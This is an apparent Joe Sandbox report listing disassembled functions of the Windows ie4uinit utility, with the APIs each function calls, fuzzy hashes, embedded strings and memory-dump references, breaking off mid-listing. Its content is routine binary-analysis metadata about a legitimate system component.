Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ClearVariant$FreeTask
String ID:
API String ID: 3803759766-0
Opcode ID: 1a8f1dc7bf4eccc52b1f31668ab4c6bb178a0e82b67953b9ce666b2428af051b
Instruction ID: 1e2768652edaa6063c8d59f80b1b87051bb26fb3f6085059efab504ff4503163
Opcode Fuzzy Hash: 1a8f1dc7bf4eccc52b1f31668ab4c6bb178a0e82b67953b9ce666b2428af051b
Instruction Fuzzy Hash: 3E11C232A1AB828AEA109F19EE400E97364FB44F54F640131DB4D4366ACF3DE99BC780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522D9AC Relevance: 6.0, APIs: 4, Instructions: 38fileCOMMON

Download Yara Rule

APIs

FlushViewOfFile.KERNEL32(?,?,80070000,00007FF6B522AD88,?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522D9CD
GetLastError.KERNEL32(?,?,80070000,00007FF6B522AD88,?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522D9D7
GetLastError.KERNEL32(?,?,80070000,00007FF6B522AD88,?,?,?,?,?,?,00000000,00007FF6B522B3AD), ref: 00007FF6B522D9EB

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FileFlushView
String ID:
API String ID: 1289402859-0
Opcode ID: 9e1235a38a9a82b667f4b9b259bc074e26f118721014f768e1804b2360a2bfb2
Instruction ID: 2cd898670d8693b352a442e6f41cd90fd913c6d20bde9b06bbb52b727f0fd109
Opcode Fuzzy Hash: 9e1235a38a9a82b667f4b9b259bc074e26f118721014f768e1804b2360a2bfb2
Instruction Fuzzy Hash: BB01D120B1EA468AFF144B7E9ED477A21D4AF88F40F580038DA0FC616AEE3DEC475200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522F3B8 Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

QueueUserWorkItem.KERNEL32 ref: 00007FF6B522F3D7
GetLastError.KERNEL32 ref: 00007FF6B522F3E8
GetLastError.KERNEL32 ref: 00007FF6B522F3FC

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ItemQueueUserWork
String ID:
API String ID: 3747073370-0
Opcode ID: 26b459fb07ff8ae6d745b80f7e5de534b080d7b479ac4d3da13ccc66191a0abf
Instruction ID: 9db5e30ae613d9c18243feff6f17ef838d789fe243303790adaf2ce81e87b73e
Opcode Fuzzy Hash: 26b459fb07ff8ae6d745b80f7e5de534b080d7b479ac4d3da13ccc66191a0abf
Instruction Fuzzy Hash: 5501A761F19B8286F7104B6EAEC57667294EF88F40F484034D70EC756ADF7DEC428610

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522B80C Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,00000000,00007FF6B522C036), ref: 00007FF6B522B81A
GetLastError.KERNEL32(?,?,00000000,00007FF6B522C036), ref: 00007FF6B522B827
GetLastError.KERNEL32(?,?,00000000,00007FF6B522C036), ref: 00007FF6B522B83B
GetLastError.KERNEL32(?,?,00000000,00007FF6B522C036), ref: 00007FF6B522B848

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 2ca3ebf0f42957a967bdbc28d60f31b8d63a258d449c8d0ece6b9fc095dabbda
Instruction ID: b2fe947e91f42bf40cf60d4e49d3198cc6440bd1ac8db5ddd6d559fc0373de58
Opcode Fuzzy Hash: 2ca3ebf0f42957a967bdbc28d60f31b8d63a258d449c8d0ece6b9fc095dabbda
Instruction Fuzzy Hash: E9F05E18B1AA478AFB642B7E1FD57B621C45F88F11F54053CCB1EC19E5EE2DEC852211

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522B7AC Relevance: 6.0, APIs: 4, Instructions: 30synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?,?,?,00007FF6B522DB48), ref: 00007FF6B522B7B6
GetLastError.KERNEL32(?,?,?,00007FF6B522DB48), ref: 00007FF6B522B7C2
GetLastError.KERNEL32(?,?,?,00007FF6B522DB48), ref: 00007FF6B522B7D4
GetLastError.KERNEL32(?,?,?,00007FF6B522DB48), ref: 00007FF6B522B7E1

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$MutexRelease
String ID:
API String ID: 3084565237-0
Opcode ID: 33da6c1b214282c24541bd467684402fe332da9d62f878218f4a3fcd0e75c909
Instruction ID: 279bda77e7e48c5557e5e9b0a8d21ff09f9ba90d8ace316def7c8c17b63a53c0
Opcode Fuzzy Hash: 33da6c1b214282c24541bd467684402fe332da9d62f878218f4a3fcd0e75c909
Instruction Fuzzy Hash: 90F05416B1AA478AE7101B7A5EC56A632D4AF48F40B584538C709C501AEE3DEC855220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5214244 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5218A08: wcsncmp.MSVCRT ref: 00007FF6B5218A3C

Part of subcall function 00007FF6B52190F4: LocalFree.KERNEL32 ref: 00007FF6B5219312

SHCreateDirectory.SHELL32 ref: 00007FF6B5214301

Part of subcall function 00007FF6B5213D20: GetShortPathNameW.KERNEL32 ref: 00007FF6B5213D69
Part of subcall function 00007FF6B5213D20: GetShortPathNameW.KERNEL32 ref: 00007FF6B5213DB5
Part of subcall function 00007FF6B5213D20: PathFindFileNameW.SHLWAPI ref: 00007FF6B5213DC7
Part of subcall function 00007FF6B5213D20: GetCurrentDirectoryW.KERNEL32 ref: 00007FF6B5213DF4
Part of subcall function 00007FF6B5213D20: SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B5213E05
Part of subcall function 00007FF6B5213D20: FindFirstFileW.KERNEL32 ref: 00007FF6B5213E1F
Part of subcall function 00007FF6B5213D20: CoCreateInstance.OLE32 ref: 00007FF6B5213E55
Part of subcall function 00007FF6B5213D20: StrCmpIW.SHLWAPI ref: 00007FF6B5213EE3

Part of subcall function 00007FF6B5213D20: StrCmpIW.SHLWAPI ref: 00007FF6B5213F0A
Part of subcall function 00007FF6B5213D20: PathRemoveBlanksW.SHLWAPI ref: 00007FF6B5213F42
Part of subcall function 00007FF6B5213D20: StrCmpICW.SHLWAPI ref: 00007FF6B5213F61
Part of subcall function 00007FF6B5213D20: StrCmpICW.SHLWAPI ref: 00007FF6B5213F79
Part of subcall function 00007FF6B5213D20: FindNextFileW.KERNEL32 ref: 00007FF6B52140C3
Part of subcall function 00007FF6B5213D20: FindClose.KERNEL32 ref: 00007FF6B52140F8
Part of subcall function 00007FF6B5213D20: FindFirstFileExW.KERNEL32 ref: 00007FF6B5214159
Part of subcall function 00007FF6B5213D20: lstrcmpW.KERNEL32 ref: 00007FF6B5214177
Part of subcall function 00007FF6B5213D20: lstrcmpW.KERNEL32 ref: 00007FF6B521418C

PathFileExistsW.SHLWAPI ref: 00007FF6B5214356

Part of subcall function 00007FF6B521894C: wcschr.MSVCRT ref: 00007FF6B52189B4

Strings

-extoff, xrefs: 00007FF6B5214368

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FileFindPath$DirectoryName$CreateCurrentFirstShortlstrcmp$BlanksCloseExistsFreeInstanceLocalNextRemovewcschrwcsncmp
String ID: -extoff
API String ID: 3822344381-2466603806
Opcode ID: 98825ebdb9f31713724772fa53d674ad79bb2e01384ac911a4ea77c056bb291f
Instruction ID: 90e69dc93ae1af8a04cf9c908f85e989ce3993c29e37fcc26f57c0b140beabe7
Opcode Fuzzy Hash: 98825ebdb9f31713724772fa53d674ad79bb2e01384ac911a4ea77c056bb291f
Instruction Fuzzy Hash: C741A572B15AD196EB25EF24DE416EA6724FB44B84F800032EF0D87A9EDF39DA05C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521DB6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

SysFreeString.OLEAUT32 ref: 00007FF6B521DC5D
SysAllocString.OLEAUT32 ref: 00007FF6B521DC66

Part of subcall function 00007FF6B5211440: SysStringLen.OLEAUT32 ref: 00007FF6B521148B

Strings

UE00, xrefs: 00007FF6B521DC51

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$AllocFreeHeapProcess
String ID: UE00
API String ID: 858782919-1381591544
Opcode ID: ef14ff598bbf0e452664927a38ddb3cb18cbf1eb245ee0fa3219198422f07669
Instruction ID: 3e40e19a68100de6ddf017684ecaf6afada49f18267577a6461a4f23602d4784
Opcode Fuzzy Hash: ef14ff598bbf0e452664927a38ddb3cb18cbf1eb245ee0fa3219198422f07669
Instruction Fuzzy Hash: 03318E7660AB5682EB148F29E9503AA23A0FB88F84F144535CF4D8375ACF3DED45C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521B6D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

LocaleNameToLCID.KERNEL32 ref: 00007FF6B521B703
LocaleNameToLCID.KERNEL32 ref: 00007FF6B521B714

Strings

!x-sys-default-locale, xrefs: 00007FF6B521B70B

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: LocaleName
String ID: !x-sys-default-locale
API String ID: 1723996188-2729719199
Opcode ID: 77d2964bf6e634fbe6c46da8917ae11e8ea4680c4c3ebb8b825402650ad88bd9
Instruction ID: f1136ecf00f0fb338045ac11d730ebc1bcf64b7a89aa0f1031056df9b6fdd71b
Opcode Fuzzy Hash: 77d2964bf6e634fbe6c46da8917ae11e8ea4680c4c3ebb8b825402650ad88bd9
Instruction Fuzzy Hash: 0E316AB6E152208EF710CF65EA482ED36F4F708B48F944434DB59A7B49CF7899468B84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5222A50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00007FF6B5222B2B

Strings

https://ieonline.microsoft.com/EUPP/v1/service?action=downloadcert&appid=Microsoft_IE_EUPP, xrefs: 00007FF6B5222AE8
dsp, xrefs: 00007FF6B5222A73

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FreeString
String ID: dsp$https://ieonline.microsoft.com/EUPP/v1/service?action=downloadcert&appid=Microsoft_IE_EUPP
API String ID: 3341692771-2070162375
Opcode ID: f2ebcd92e17cde95b4c56e211319ff0c8199f1a47e1738f4427e9bd58a7c66b1
Instruction ID: cf85e988dca80d73e298822f199f87edbc633ed16dc9c8f20caa226bec2fbaf2
Opcode Fuzzy Hash: f2ebcd92e17cde95b4c56e211319ff0c8199f1a47e1738f4427e9bd58a7c66b1
Instruction Fuzzy Hash: DA214C26A29A8186E720CF08E9407AAB364FB84B94F644135D78DCBA59CF7ED945CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521641C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00007FF6B52125CC), ref: 00007FF6B521644E
CoTaskMemFree.OLE32 ref: 00007FF6B5216493

Strings

StartMenuInternet, xrefs: 00007FF6B5216473

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CreateFreeInstanceTask
String ID: StartMenuInternet
API String ID: 1992417041-1263441292
Opcode ID: 3d57a36961733dde3a36942b01dfdcb565751e0e842a8bba9ffe591c66bcfdad
Instruction ID: fde2bd1a2cadc58a9fdf375929a407017162a8ad56e4504d7daf146316904845
Opcode Fuzzy Hash: 3d57a36961733dde3a36942b01dfdcb565751e0e842a8bba9ffe591c66bcfdad
Instruction Fuzzy Hash: 17116336719B1585EB208F19EA801AD73B4FB84F81B544036CF5D83769DE7EE945D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5230DA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211394: _vsnwprintf.MSVCRT ref: 00007FF6B52113D4

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6B5230DFC
GetLastError.KERNEL32 ref: 00007FF6B5230E06

Strings

D:(A;;GA;;;SY)(A;;0x%x;;;%s)S:(ML;;1;;;LW), xrefs: 00007FF6B5230DCB

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: DescriptorSecurity$ConvertErrorLastString_vsnwprintf
String ID: D:(A;;GA;;;SY)(A;;0x%x;;;%s)S:(ML;;1;;;LW)
API String ID: 3097636412-633327700
Opcode ID: 5d7bcdc61ff2071e30052c043dde8b180b2cd11917512c1e8b54faa1ed1eabd2
Instruction ID: 74e7aec435505b9fd0d720774ce4146316065c73dc42327fa8fc9960569bd7b4
Opcode Fuzzy Hash: 5d7bcdc61ff2071e30052c043dde8b180b2cd11917512c1e8b54faa1ed1eabd2
Instruction Fuzzy Hash: 2E018032B19B8286E7609B69EA947E632D4BF98B44F400131DB4DC6A4AEF3CD809C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5223254 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21synchronizationCOMMON

Download Yara Rule

APIs

#74.IERTUTIL(?,?,00000000,00007FF6B521D605,?,?,00000000,00007FF6B521D533), ref: 00007FF6B5223266
CreateMutexW.KERNEL32(?,?,00000000,00007FF6B521D605,?,?,00000000,00007FF6B521D533), ref: 00007FF6B5223286

Strings

{5312EE61-79E3-4A24-BFE1-132B85B23C3A}, xrefs: 00007FF6B5223271

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CreateMutex
String ID: {5312EE61-79E3-4A24-BFE1-132B85B23C3A}
API String ID: 1964310414-3805012793
Opcode ID: 38e0ecbed216c7f8256dceb7e245e11f843dbeaa064275fe13cb75f85fc44150
Instruction ID: 2b783c16b8d705d848b744ebc179e8a61124a7363d1a3eb2aaaeda9a77f2a40b
Opcode Fuzzy Hash: 38e0ecbed216c7f8256dceb7e245e11f843dbeaa064275fe13cb75f85fc44150
Instruction Fuzzy Hash: F5E06D32709B859BD71CCFA5FE801A97261FB48B40B448438CB0E83728DF38E8658704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5212670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5215974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B52159AD
Part of subcall function 00007FF6B5215974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B5215A1F
Part of subcall function 00007FF6B5215974: PostThreadMessageW.USER32 ref: 00007FF6B5215A39

CoInitializeEx.OLE32 ref: 00007FF6B521268E

Part of subcall function 00007FF6B5216B98: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,00007FF6B521269D), ref: 00007FF6B5216BDD
Part of subcall function 00007FF6B5216B98: RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6B521269D), ref: 00007FF6B5216C02
Part of subcall function 00007FF6B5216B98: RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6B521269D), ref: 00007FF6B5216C1A
Part of subcall function 00007FF6B5216B98: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,00007FF6B521269D), ref: 00007FF6B5216C54
Part of subcall function 00007FF6B5216B98: RegQueryValueExW.ADVAPI32 ref: 00007FF6B5216C88
Part of subcall function 00007FF6B5216B98: RegCloseKey.ADVAPI32 ref: 00007FF6B5216CA6

Part of subcall function 00007FF6B52153B8: CoInitializeEx.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B52125CC), ref: 00007FF6B52153F1
Part of subcall function 00007FF6B52153B8: RegOpenKeyExW.ADVAPI32 ref: 00007FF6B52155B6
Part of subcall function 00007FF6B52153B8: RegOpenKeyExW.ADVAPI32 ref: 00007FF6B52155E9

CoUninitialize.OLE32 ref: 00007FF6B52126AA

Strings

In CmdApplySpadSettingsDuringMigration, xrefs: 00007FF6B5212674

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Open$CloseInitializeMessageQueryValue$FormatLocalPostThreadTimeUninitialize
String ID: In CmdApplySpadSettingsDuringMigration
API String ID: 2480159940-3820774719
Opcode ID: 45f46f1b304cf1544727d0f0c5ea286481fd1ca5fc0f350c40b161f95121f49b
Instruction ID: 1085d42149b00ba474a7453455b94a31d93e60cc8dc3e9504b3018b3c0ca0a64
Opcode Fuzzy Hash: 45f46f1b304cf1544727d0f0c5ea286481fd1ca5fc0f350c40b161f95121f49b
Instruction Fuzzy Hash: A0E01250B0A56385E718AB29DE411EA22516F44F40F808431C30EC609BDD3DFD568A00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522DEA4 Relevance: 5.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF6B522DEE6
GetLastError.KERNEL32 ref: 00007FF6B522DEF3
GetLastError.KERNEL32 ref: 00007FF6B522DF07

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWide
String ID:
API String ID: 3361762293-0
Opcode ID: c10b244ca7df13b8a8b68ef7ee15e5365b36afd1d30c09e8c4368d1a251849f3
Instruction ID: adbbbdc0639cde3a607c3436ac5b0fcccb34d597e28e8323c4bb9d8538aaee02
Opcode Fuzzy Hash: c10b244ca7df13b8a8b68ef7ee15e5365b36afd1d30c09e8c4368d1a251849f3
Instruction Fuzzy Hash: 1B11C67171E78186FB205B2AEE8027962D5AF48F80F544134CB4DC7269EE3DE8465204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52180A4 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6B52180D5
HeapFree.KERNEL32 ref: 00007FF6B52180E3
GetProcessHeap.KERNEL32 ref: 00007FF6B5218101
HeapFree.KERNEL32 ref: 00007FF6B521810F

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5ad889370e4e662f527ba3b3425e6f5da57ba0b4c1df0aa1662ad4328b6c2e6b
Instruction ID: 81622020b33cd071e4cfaa449974c57cf801139c86b25fa5a6b4ce47ce7a322a
Opcode Fuzzy Hash: 5ad889370e4e662f527ba3b3425e6f5da57ba0b4c1df0aa1662ad4328b6c2e6b
Instruction Fuzzy Hash: D6014072A06B5586DB109F66FA44099B3B4FB48F94B5C8035DB8D43B19EF3DE892C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52224A0 Relevance: 5.0, APIs: 4, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,00007FF6B522248E,?,?,00000001,00007FF6B52222F4), ref: 00007FF6B52224C5
HeapFree.KERNEL32(?,?,00000000,00007FF6B522248E,?,?,00000001,00007FF6B52222F4), ref: 00007FF6B52224D3
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6B522248E,?,?,00000001,00007FF6B52222F4), ref: 00007FF6B52224E8
